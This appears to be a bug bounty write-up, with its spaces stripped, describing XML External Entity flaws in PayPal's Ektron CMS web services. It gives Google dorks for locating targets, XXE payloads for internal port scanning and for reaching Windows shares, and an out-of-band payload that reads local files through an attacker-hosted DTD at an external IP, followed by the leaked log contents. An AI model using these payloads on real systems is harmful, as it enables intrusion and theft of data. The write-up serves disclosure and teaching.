Embed Size (px)
Citation preview
PaypalXXESeanMelia@seanmeals
https://www.linkedin.com/in/meliaseanhttps://www.hackerone.com/meals
IntroductionIwasabletofindthreeXMLExternalEntity(XXE)attacksonPayPal’sexternallyfacingsites.ThevulnerabilitiesarerelatedtoEktronCMSwhichhasbeennotoriousforvulnerabilities.PaypalwasrunninganolderversionofEktronwhichleftthewebservicesexposed.Here’sthewriteup!ExploitGoogleDorktofindsomePayPalservicesrunningEktron:inurl:robots.txtintext:Disallow:/workarea/site:*.paypal.*https://www.paypal.fr/WorkArea/webservices/SearchService.asmx?op=ExecuteSearch
Manyofthewebservicesrequireauthentication,howeverthesearchfunctionsdonot!SurprisinglythesearethefunctionsthatareusingavulnerableXMLparser!BysubmittingthequeryparameterwithablankvalueIwaspresentedwithanerrorreferencingLoadXml,whichinthepasthasbeenvulnerabletoXXE.
IthensubmittedsomeXMLtotestifIcouldscanportsontheirinternalservers/networks.Iwasableto!Payload:query=<?xmlversion="1.0"encoding="ISO-8859-1"?><!DOCTYPEfoo[<!ELEMENTfooANY><!ENTITYxxeSYSTEM"http://127.0.0.1:80">]><foo>&xxe;</foo>Port80responseshowsthereisaservicelistening:
Port22responseshowsthereisnoservicelistening:
Changetheportnumbertowhateverportyouwouldliketoscanorrunitthroughintruderanddoanautomatedportscan.Comparetheresponsesizesandcontenttodeterminewhichportshaveaservicelisteningonthem.Anythingwitharesponsesizedifferentfrom2453showsthatthereisaservicelistening.
ThiscanbeusedtoenumerateserviceslisteninginternallythatmaybevulnerabletoSQLinjectionorcommandexecutionviaGETparametersintheURL.E.g.http://10.10.10.67:9999/?id=’waitfordelay’00:00:10’---ThisattackcanalsoconnecttoWindowsShares.Anattackercanscantheinternalnetworkandlookforopensharescontainingsensitivedocuments.Payload:query=<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEroottag[<!ENTITY%fileSYSTEM"\\localhost\Admin$"><!ENTITY%dtdSYSTEM"http://104.236.212.244/evil1.dtd">%dtd;]><roottag>&send;</roottag>
Icanalsoreadlocalfilesoffofthewebserverusinganout-of-bandmethodbyhostinganexternalDTD.
Payload:query=<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEroottag[<!ENTITY%fileSYSTEM"file:///c:\windows\win.ini"><!ENTITY%dtdSYSTEM"http://104.236.212.244/evil1.dtd">%dtd;]><roottag>&send;</roottag>
External.dtdfilethatIamreferencingfrommyserver:
Thewin.inifileoutputtedtomyserverlogs:
URLDecodedoutput:;for16-bitappsupport[fonts][extensions][mciextensions][files]
[Mail]MAPI=1SomevariouslogfilesfoundonwindowssystemsthatIwasabletopullaswell:C:\windows\security\logs\scecomp.old03/05/201115:15:47 Succeed Update Key MACHINE\System\CurrentControlSet\Services\Tcpip Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCLCSWRPRC;;;NS)(A;CI;KR;;;LS)(A;CI;CCLCSWRPRC;;;NO)(A;CI;CCLCSWRPRC;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CIIO;RC;;;OW)03/05/201115:15:47 Succeed Update Key MACHINE\System\CurrentControlSet\Services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPRC;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)03/05/201115:15:47 Succeed Update Key
MACHINE\System\CurrentControlSet\Control\Network Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S-1-5-80-2898649604-2335086160-1904548223-3761738420-3855444835)(A;CIIO;RC;;;S-1-3-4)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\Linkage Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S-1-5-80-2898649604-2335086160-1904548223-3761738420-3855444835)(A;CIIO;RC;;;S-1-3-4)03/05/201115:15:47 Succeed Update Key MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCDCLCSWRPWPSDRC;;;NS)(A;CI;KR;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CIIO;RC;;;OW)(A;CI;KRKW;;;S-1-5-80-3981856537-581775623-1136376035-2066872258-409572886)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;GRLCSWCCRPRC;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CI;GR;;;LS)(A;CI;GR;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6 Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;GRLCSWCCRPRC;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CI;GR;;;LS)(A;CI;GR;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Dhcp\Configurations Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;GA;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;GA;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)
03/05/201115:15:47 Succeed Update Key MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6\Options Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;GA;;;S-1-5-80-2940520708-3855866260-481812779-327648279-1710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)C:\windows\security\logs\scesrv.log-------------------------------------------Wednesday,June11,20141:54:02AM----Configurationenginewasinitializedsuccessfully.--------ReadingConfigurationTemplateinfo...----ConfigureUserRights... SeImpersonatePrivilegemustbeassignedtoadministrators.Thissettingisadjusted. SeImpersonatePrivilegemustbeassignedtoSERVICE.Thissettingisadjusted. ConfigureS-1-5-19. ConfigureS-1-5-20. ConfigureS-1-5-21-3982848173-2833271265-4254726511-1004. ConfigureS-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133. ConfigureS-1-5-82-1078778675-3072034145-2029527255-507015838-1043371142. ConfigureS-1-5-82-145413143-1359051115-2505700303-416071298-1291788329. ConfigureS-1-5-82-2996991680-68878715-1649194708-1406811187-2978222158. ConfigureS-1-5-82-4280230437-51877121-4113000123-3368864887-1387175710. ConfigureS-1-5-82-606752505-1068012140-2233443849-2437949346-1804447525. ConfigureS-1-5-32-544. ConfigureS-1-5-32-551. ConfigureS-1-5-32-559. ConfigureS-1-5-32-568. ConfigureS-1-1-0. ConfigureS-1-5-32-545. ConfigureS-1-5-6. ConfigureS-1-5-21-3982848173-2833271265-4254726511-1008. ConfigureS-1-5-32-555. ConfigureS-1-5-80-0.
ConfigureS-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420. UserRightsconfigurationwascompletedsuccessfully.----Un-initializeconfigurationengine...ConclusionTheimpactofthisXXEisthatapersistentattackercanfindthelocationofsensitivefilessuchasweb.configandstealprivateinformationfromPayPal.TheycanthenusethisinformationandotherinformationretrievedfromotherconfigurationfilestopivottootherservicesthatPayPalusestoholdinternalandcustomerdata.AdditionalInfoAnumberofdomainsvulnerabletothisexploitarebelow:
GoogleDorkstofindotherEktroninstances
1. inurl:/WorkArea/webservices/2. inurl:robots.txtintext:Disallow:/workarea/
Resourceshttp://blog.h3xstream.com/2014/06/identifying-xml-external-entity.htmlhttps://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
